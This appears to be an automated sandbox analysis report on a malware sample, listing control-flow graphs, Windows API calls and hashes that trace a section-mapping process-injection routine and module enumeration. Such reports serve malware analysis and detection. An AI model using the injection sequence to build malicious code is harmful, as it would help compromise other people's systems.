4059 40313d 4057->4059 4058->4059 4060 4030df RtlCreateUserThread NtTerminateProcess 4058->4060 4060->4059 4061 402ebc 4064 402eb4 4061->4064 4062 402f18 4066 402f4c 4062->4066 4072 401902 4062->4072 4064->4062 4064->4066 4067 4020ea 4064->4067 4068 4020fb 4067->4068 4069 40214e 4068->4069 4070 402152 NtQuerySystemInformation 4068->4070 4071 40216e 4068->4071 4069->4068 4069->4070 4070->4069 4071->4062 4073 401913 4072->4073 4074 401946 Sleep 4073->4074 4075 401961 4074->4075 4077 401972 4075->4077 4078 401529 4075->4078 4077->4066 4079 401539 4078->4079 4080 4015d5 NtDuplicateObject 4079->4080 4087 4016f1 4079->4087 4081 4015f2 NtCreateSection 4080->4081 4080->4087 4082 401672 NtCreateSection 4081->4082 4083 401618 NtMapViewOfSection 4081->4083 4085 40169e 4082->4085 4082->4087 4083->4082 4084 40163b NtMapViewOfSection 4083->4084 4084->4082 4086 401659 4084->4086 4085->4087 4088 4016a8 NtMapViewOfSection 4085->4088 4086->4082 4087->4077 4088->4087 4089 4016cf NtMapViewOfSection 4088->4089 4089->4087 4114 4020fc 4115 402107 4114->4115 4116 402152 NtQuerySystemInformation 4115->4116 4117 40216e 4115->4117 4116->4115

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 0 418a70-418a98 2 418aa0-418aa7 0->2 3 418ad4-418ada 2->3 4 418aa9-418ad0 2->4 5 418adc-418ae8 3->5 6 418aee-418af8 3->6 4->3 5->6 7 418b33-418b3a 6->7 8 418afa-418b29 6->8 7->2 9 418b40-418b46 7->9 8->7 11 418b48-418b4e 9->11 12 418b50-418b56 11->12 13 418b5c-418b66 11->13 12->13 14 418b68 13->14 15 418b6a-418b71 13->15 14->15 15->11 16 418b73-418b7a 15->16 17 418b80-418c96 InterlockedCompareExchange GetFocus ReadConsoleA FindAtomA SearchPathA SetConsoleMode SearchPathW GetDefaultCommConfigA CopyFileExW CreatePipe GetEnvironmentStringsW WriteConsoleOutputA GetModuleFileNameA GetSystemTimeAdjustment 16->17 18 418cc6-418cd2 16->18 21 418ca4-418cab 17->21 22 418c98-418c9e ObjectPrivilegeAuditAlarmW 17->22 19 418cd4-418ce2 SetCommState 18->19 26 418ce4-418ceb 19->26 27 418ced-418cf4 19->27 24 418cb5-418cc3 21->24 25 418cad-418caf WaitForSingleObject 21->25 22->21 24->18 25->24 26->19 26->27 28 418daa-418db9 call 418740 27->28 29 418cfa-418da4 GetConsoleAliasesLengthW GetComputerNameA CopyFileW GetFileAttributesA GetConsoleAliasExesLengthW GetBinaryType FormatMessageA GetLongPathNameA PurgeComm 27->29 35 418dbb-418dcc 28->35 36 418ded-418df8 LoadLibraryA call 418770 28->36 29->28 37 418dd0-418de0 35->37 42 418dfd-418e0e call 4189d0 36->42 40 418de2 37->40 41 418de8-418deb 37->41 40->41 41->36 41->37 47 418e10-418e17 42->47 48 418e19-418e27 MoveFileW 47->48 49 418e2d-418e33 47->49 48->49 51 418e35 call 418760 49->51 52 418e3a-418e41 49->52 51->52 54 418e43-418e4e InterlockedCompareExchange 52->54 55 418e54-418e5b 52->55 54->55 55->47 57 418e5d-418e6d 55->57 58 418e70-418e80 57->58 60 418e82 58->60 61 418e89-418e8c 58->61 60->61 61->58 62 418e8e-418e99 61->62 63 418ea0-418ea5 62->63 64 418ea7-418ead 63->64 65 418eaf-418eb5 63->65 64->65 66 418eb7-418ec4 64->66 65->63 65->66
                                                                                                                            APIs
                                                                                                                            • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 00418B8B
                                                                                                                            • GetFocus.USER32 ref: 00418B91
                                                                                                                            • ReadConsoleA.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00418B9E
                                                                                                                            • FindAtomA.KERNEL32(00000000), ref: 00418BA5
                                                                                                                            • SearchPathA.KERNEL32(00000000,00000000,00000000,00000000,?,?), ref: 00418BBD
                                                                                                                            • SetConsoleMode.KERNEL32(00000000,00000000), ref: 00418BC5
                                                                                                                            • SearchPathW.KERNEL32(00000000,00000000,00000000,00000000,?,?), ref: 00418BDD
                                                                                                                            • GetDefaultCommConfigA.KERNEL32(00000000,?,00000000), ref: 00418C04
                                                                                                                            • CopyFileExW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00418C10
                                                                                                                            • CreatePipe.KERNEL32(?,00000000,00000000,00000000), ref: 00418C26
                                                                                                                            • GetEnvironmentStringsW.KERNEL32 ref: 00418C2C
                                                                                                                            • WriteConsoleOutputA.KERNEL32(00000000,?,?,?,?), ref: 00418C71
                                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000000), ref: 00418C80
                                                                                                                            • GetSystemTimeAdjustment.KERNEL32(00000000,00000000,00000000), ref: 00418C89
                                                                                                                            • ObjectPrivilegeAuditAlarmW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00418C9E
                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 00418CAF
                                                                                                                            • SetCommState.KERNELBASE(00000000,00000000), ref: 00418CD8
                                                                                                                            • GetConsoleAliasesLengthW.KERNEL32(00000000), ref: 00418D09
                                                                                                                            • GetComputerNameA.KERNEL32(?,?), ref: 00418D1D
                                                                                                                            • CopyFileW.KERNEL32(0041A3AC,0041A380,00000000), ref: 00418D2E
                                                                                                                            • GetFileAttributesA.KERNEL32(00000000), ref: 00418D35
                                                                                                                            • GetConsoleAliasExesLengthW.KERNEL32 ref: 00418D3B
                                                                                                                            • GetBinaryType.KERNEL32(0041A3C8,?), ref: 00418D4D
                                                                                                                            • FormatMessageA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00418D60
                                                                                                                            • GetLongPathNameA.KERNEL32(0041A3E4,?,00000000), ref: 00418D73
                                                                                                                            • PurgeComm.KERNEL32(00000000,00000000), ref: 00418D7B
                                                                                                                            • LoadLibraryA.KERNELBASE(0041A3EC), ref: 00418DF2
                                                                                                                            • MoveFileW.KERNEL32(00000000,00000000), ref: 00418E27
                                                                                                                            • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 00418E4E
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.1658546479.000000000040B000.00000020.00000001.01000000.00000006.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_40b000_oBuf.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ConsoleFile$CommNamePath$CompareCopyExchangeInterlockedLengthObjectSearch$AdjustmentAlarmAliasAliasesAtomAttributesAuditBinaryComputerConfigCreateDefaultEnvironmentExesFindFocusFormatLibraryLoadLongMessageModeModuleMoveOutputPipePrivilegePurgeReadSingleStateStringsSystemTimeTypeWaitWrite
                                                                                                                            • String ID: k`$}$
                                                                                                                            • API String ID: 2220722107-956986773
                                                                                                                            • Opcode ID: 27396c0720b35830d8978bde3fab0e4ce9b55130db9d37ea9e37c6b107803055
                                                                                                                            • Instruction ID: 0c0e40555d578e92a9f225f047ccd42c64e3c90cdaccad76b264c498dc6ec0a1
                                                                                                                            • Opcode Fuzzy Hash: 27396c0720b35830d8978bde3fab0e4ce9b55130db9d37ea9e37c6b107803055
                                                                                                                            • Instruction Fuzzy Hash: 9FB1A0B1901224ABCB219B65EC58EDF7B78EF49350F00816EF649A3150DB785EC4CFA9

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 68 4014db-4014e7 69 401486-40148b 68->69 70 4014e9 68->70 71 401550-401569 70->71 72 4014eb 70->72 77 40155d-40156c call 4011a4 71->77 73 40155a 72->73 74 4014ed-4014fb 72->74 73->77 80 40149a-4014a8 74->80 81 4014fd-4014ff 74->81 84 40156e-40157f 77->84 89 4014c1-4014c8 80->89 83 401501 81->83 81->84 87 401504-401518 83->87 88 40148f 83->88 85 401581 84->85 86 401584-401589 84->86 85->86 98 4018a6-4018ae 86->98 99 40158f-4015a0 86->99 87->89 90 40151a 87->90 88->80 91 401469-401485 call 4011a4 89->91 92 4014ca 89->92 95 401539-401555 90->95 96 40151c-401526 90->96 91->69 92->68 95->71 98->86 106 4018a4-4018b3 99->106 107 4015a6-4015cf 99->107 109 4018c8 106->109 110 4018b9-4018c4 106->110 107->106 115 4015d5-4015ec NtDuplicateObject 107->115 109->110 112 4018cb-4018ff call 4011a4 109->112 110->112 115->106 117 4015f2-401616 NtCreateSection 115->117 119 401672-401698 NtCreateSection 117->119 120 401618-401639 NtMapViewOfSection 117->120 119->106 124 40169e-4016a2 119->124 120->119 122 40163b-401657 NtMapViewOfSection 120->122 122->119 125 401659-40166f 122->125 124->106 127 4016a8-4016c9 NtMapViewOfSection 124->127 125->119 127->106 129 4016cf-4016eb NtMapViewOfSection 127->129 129->106 132 4016f1 call 4016f6 129->132
                                                                                                                            APIs
                                                                                                                            • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
                                                                                                                            • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
                                                                                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401634
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.1658523748.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_400000_oBuf.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Section$CreateDuplicateObjectView
                                                                                                                            • String ID: 1
                                                                                                                            • API String ID: 1652636561-2212294583
                                                                                                                            • Opcode ID: fc9ad0c17474763d406ce3553705aad449b4f49c1046925f20dec018cbeb3551
                                                                                                                            • Instruction ID: 7f4d7c4657737381e02ab4131f106e217a3bc84f51a1891dc43a423f49ad99c1
                                                                                                                            • Opcode Fuzzy Hash: fc9ad0c17474763d406ce3553705aad449b4f49c1046925f20dec018cbeb3551
                                                                                                                            • Instruction Fuzzy Hash: 14718D71A00205FFEB209F91CC49FEF7BB8EF85B10F14412AF912BA2E5D6759905CA58

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 219 401529-401532 220 401543 219->220 221 401539-40153f 219->221 220->221 222 401546-40157f call 4011a4 220->222 221->222 232 401581 222->232 233 401584-401589 222->233 232->233 235 4018a6-4018ae 233->235 236 40158f-4015a0 233->236 235->233 239 4018a4-4018b3 236->239 240 4015a6-4015cf 236->240 242 4018c8 239->242 243 4018b9-4018c4 239->243 240->239 248 4015d5-4015ec NtDuplicateObject 240->248 242->243 245 4018cb-4018ff call 4011a4 242->245 243->245 248->239 250 4015f2-401616 NtCreateSection 248->250 252 401672-401698 NtCreateSection 250->252 253 401618-401639 NtMapViewOfSection 250->253 252->239 257 40169e-4016a2 252->257 253->252 255 40163b-401657 NtMapViewOfSection 253->255 255->252 258 401659-40166f 255->258 257->239 260 4016a8-4016c9 NtMapViewOfSection 257->260 258->252 260->239 262 4016cf-4016eb NtMapViewOfSection 260->262 262->239 265 4016f1 call 4016f6 262->265
                                                                                                                            APIs
                                                                                                                            • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
                                                                                                                            • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
                                                                                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401634
                                                                                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401652
                                                                                                                            • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401693
                                                                                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016C4
                                                                                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016E6
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.1658523748.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_400000_oBuf.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Section$View$Create$DuplicateObject
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1546783058-0
                                                                                                                            • Opcode ID: 9208168e61d895202d66972dbe02163783dcb6df2364333cde88f6d05e7d9971
                                                                                                                            • Instruction ID: 138ec7ca1e8744eb65f40bd9736a53a73cefe8eecd72c79945fcbf62a21b6401
                                                                                                                            • Opcode Fuzzy Hash: 9208168e61d895202d66972dbe02163783dcb6df2364333cde88f6d05e7d9971
                                                                                                                            • Instruction Fuzzy Hash: D9616E71900205FBEB209F95DC49FEB7BB8FF81B00F14412AFA12BA1E4D6749A05DB65

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 267 401534-40157f call 4011a4 278 401581 267->278 279 401584-401589 267->279 278->279 281 4018a6-4018ae 279->281 282 40158f-4015a0 279->282 281->279 285 4018a4-4018b3 282->285 286 4015a6-4015cf 282->286 288 4018c8 285->288 289 4018b9-4018c4 285->289 286->285 294 4015d5-4015ec NtDuplicateObject 286->294 288->289 291 4018cb-4018ff call 4011a4 288->291 289->291 294->285 296 4015f2-401616 NtCreateSection 294->296 298 401672-401698 NtCreateSection 296->298 299 401618-401639 NtMapViewOfSection 296->299 298->285 303 40169e-4016a2 298->303 299->298 301 40163b-401657 NtMapViewOfSection 299->301 301->298 304 401659-40166f 301->304 303->285 306 4016a8-4016c9 NtMapViewOfSection 303->306 304->298 306->285 308 4016cf-4016eb NtMapViewOfSection 306->308 308->285 311 4016f1 call 4016f6 308->311
                                                                                                                            APIs
                                                                                                                            • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
                                                                                                                            • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
                                                                                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401634
                                                                                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401652
                                                                                                                            • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401693
                                                                                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016C4
                                                                                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016E6
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.1658523748.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_400000_oBuf.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Section$View$Create$DuplicateObject
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1546783058-0
                                                                                                                            • Opcode ID: bf712b81fe7c33e45fb91e121ae8a1411471c4f54e6f2b27f252d32f249b509c
                                                                                                                            • Instruction ID: 46ca3ae5353e1b2bf85c7e7487c0bf4a09c0837efea8bedcf4105f5ea6450319
                                                                                                                            • Opcode Fuzzy Hash: bf712b81fe7c33e45fb91e121ae8a1411471c4f54e6f2b27f252d32f249b509c
                                                                                                                            • Instruction Fuzzy Hash: 81512971900245BFEF209F91CC48FEB7BB8EF85B00F14416AF912BA1A5D6749945CB24

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 313 401541-401543 315 401546-40157f call 4011a4 313->315 316 401539-40153f 313->316 326 401581 315->326 327 401584-401589 315->327 316->315 326->327 329 4018a6-4018ae 327->329 330 40158f-4015a0 327->330 329->327 333 4018a4-4018b3 330->333 334 4015a6-4015cf 330->334 336 4018c8 333->336 337 4018b9-4018c4 333->337 334->333 342 4015d5-4015ec NtDuplicateObject 334->342 336->337 339 4018cb-4018ff call 4011a4 336->339 337->339 342->333 344 4015f2-401616 NtCreateSection 342->344 346 401672-401698 NtCreateSection 344->346 347 401618-401639 NtMapViewOfSection 344->347 346->333 351 40169e-4016a2 346->351 347->346 349 40163b-401657 NtMapViewOfSection 347->349 349->346 352 401659-40166f 349->352 351->333 354 4016a8-4016c9 NtMapViewOfSection 351->354 352->346 354->333 356 4016cf-4016eb NtMapViewOfSection 354->356 356->333 359 4016f1 call 4016f6 356->359
                                                                                                                            APIs
                                                                                                                            • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
                                                                                                                            • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
                                                                                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401634
                                                                                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401652
                                                                                                                            • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401693
                                                                                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016C4
                                                                                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016E6
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.1658523748.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_400000_oBuf.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Section$View$Create$DuplicateObject
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1546783058-0
                                                                                                                            • Opcode ID: fdd984ed4eabfdf3fe245d48b6addcc777c2a155290e4dc39758af1e8cc42314
                                                                                                                            • Instruction ID: 68c08b8250816e380b35483fe5a52fcf5a4ffa7bf922b91d474b11e8be87ed95
                                                                                                                            • Opcode Fuzzy Hash: fdd984ed4eabfdf3fe245d48b6addcc777c2a155290e4dc39758af1e8cc42314
                                                                                                                            • Instruction Fuzzy Hash: 99512AB1900205BFEF209F95CC48FEB7BB8EF85B10F14412AFA12BA1E5D6749945CB24

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 361 401545-40157f call 4011a4 369 401581 361->369 370 401584-401589 361->370 369->370 372 4018a6-4018ae 370->372 373 40158f-4015a0 370->373 372->370 376 4018a4-4018b3 373->376 377 4015a6-4015cf 373->377 379 4018c8 376->379 380 4018b9-4018c4 376->380 377->376 385 4015d5-4015ec NtDuplicateObject 377->385 379->380 382 4018cb-4018ff call 4011a4 379->382 380->382 385->376 387 4015f2-401616 NtCreateSection 385->387 389 401672-401698 NtCreateSection 387->389 390 401618-401639 NtMapViewOfSection 387->390 389->376 394 40169e-4016a2 389->394 390->389 392 40163b-401657 NtMapViewOfSection 390->392 392->389 395 401659-40166f 392->395 394->376 397 4016a8-4016c9 NtMapViewOfSection 394->397 395->389 397->376 399 4016cf-4016eb NtMapViewOfSection 397->399 399->376 402 4016f1 call 4016f6 399->402
                                                                                                                            APIs
                                                                                                                            • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
                                                                                                                            • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
                                                                                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401634
                                                                                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401652
                                                                                                                            • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401693
                                                                                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016C4
                                                                                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016E6
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.1658523748.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_400000_oBuf.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Section$View$Create$DuplicateObject
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1546783058-0
                                                                                                                            • Opcode ID: 9036e7d1caaa2f73f8ffe8f81ed6686f8338ecb8473fc941f507ff01140d436f
                                                                                                                            • Instruction ID: b5c9534ba5f5358dff2a074a80b826bd55324152c05987841a878028393b6fdb
                                                                                                                            • Opcode Fuzzy Hash: 9036e7d1caaa2f73f8ffe8f81ed6686f8338ecb8473fc941f507ff01140d436f
                                                                                                                            • Instruction Fuzzy Hash: 94513AB1900245BFEF209F95CC48FEF7BB8EF85B00F14415AF911BA2A5D6749945CB24

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 404 401553-40157f call 4011a4 411 401581 404->411 412 401584-401589 404->412 411->412 414 4018a6-4018ae 412->414 415 40158f-4015a0 412->415 414->412 418 4018a4-4018b3 415->418 419 4015a6-4015cf 415->419 421 4018c8 418->421 422 4018b9-4018c4 418->422 419->418 427 4015d5-4015ec NtDuplicateObject 419->427 421->422 424 4018cb-4018ff call 4011a4 421->424 422->424 427->418 429 4015f2-401616 NtCreateSection 427->429 431 401672-401698 NtCreateSection 429->431 432 401618-401639 NtMapViewOfSection 429->432 431->418 436 40169e-4016a2 431->436 432->431 434 40163b-401657 NtMapViewOfSection 432->434 434->431 437 401659-40166f 434->437 436->418 439 4016a8-4016c9 NtMapViewOfSection 436->439 437->431 439->418 441 4016cf-4016eb NtMapViewOfSection 439->441 441->418 444 4016f1 call 4016f6 441->444
                                                                                                                            APIs
                                                                                                                            • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
                                                                                                                            • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
                                                                                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401634
                                                                                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401652
                                                                                                                            • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401693
                                                                                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016C4
                                                                                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016E6
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.1658523748.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_400000_oBuf.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Section$View$Create$DuplicateObject
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1546783058-0
                                                                                                                            • Opcode ID: 7e7aa486a7cba38a24c4655809e077ce32b0d632fdebb8ad14eb01bbdf3cd026
                                                                                                                            • Instruction ID: 8d6641cc39e0a23de402a6cd7af9a8bcce9404ceaedab19c941a5a8b34b5f284
                                                                                                                            • Opcode Fuzzy Hash: 7e7aa486a7cba38a24c4655809e077ce32b0d632fdebb8ad14eb01bbdf3cd026
                                                                                                                            • Instruction Fuzzy Hash: 8C5119B1900205BFEF209F95CC48FEFBBB8EF85B00F14411AFA11AA2A5D6759945CB24

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 447 402ffa-40301e 448 403024-40303c 447->448 449 40313d-403142 447->449 448->449 450 403042-403053 448->450 451 403055-40305e 450->451 452 403063-403071 451->452 452->452 453 403073-40307a 452->453 454 40309c-4030a3 453->454 455 40307c-40309b 453->455 456 4030c5-4030c8 454->456 457 4030a5-4030c4 454->457 455->454 458 4030d1 456->458 459 4030ca-4030cd 456->459 457->456 458->451 461 4030d3-4030d8 458->461 459->458 460 4030cf 459->460 460->461 461->449 462 4030da-4030dd 461->462 462->449 463 4030df-40313a RtlCreateUserThread NtTerminateProcess 462->463 463->449
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.1658523748.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_400000_oBuf.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateProcessTerminateThreadUser
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1921587553-0
                                                                                                                            • Opcode ID: be8e4cb5e493dd895ba0f666486257db29135dc3ef83a78b0b3b9a47898ca96e
                                                                                                                            • Instruction ID: 67905ead67b615cb9fd2ac39997d468ff33d28dd355ca5d175fe45067cf906e9
                                                                                                                            • Opcode Fuzzy Hash: be8e4cb5e493dd895ba0f666486257db29135dc3ef83a78b0b3b9a47898ca96e
                                                                                                                            • Instruction Fuzzy Hash: 8B414732618E0C4FD778EE6CA88966377D5E798351B1643AAD809D3389EE30D85183C5

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 464 9106f7-910710 465 910712-910714 464->465 466 910716 465->466 467 91071b-910727 CreateToolhelp32Snapshot 465->467 466->467 468 910737-910744 Module32First 467->468 469 910729-91072f 467->469 470 910746-910747 call 9103b6 468->470 471 91074d-910755 468->471 469->468 474 910731-910735 469->474 475 91074c 470->475 474->465 474->468 475->471
                                                                                                                            APIs
                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 0091071F
                                                                                                                            • Module32First.KERNEL32(00000000,00000224), ref: 0091073F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.1659047327.000000000090D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0090D000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_90d000_oBuf.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3833638111-0
                                                                                                                            • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                            • Instruction ID: 4f606031f00bd0870efa08edb3ef0ad35fba653e565298d9ccb943b878db1aaa
                                                                                                                            • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                            • Instruction Fuzzy Hash: F6F06831300719ABD7203AB59C8DBAE76ECAF89724F100528E547D51C1DBB5FCC58A51

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
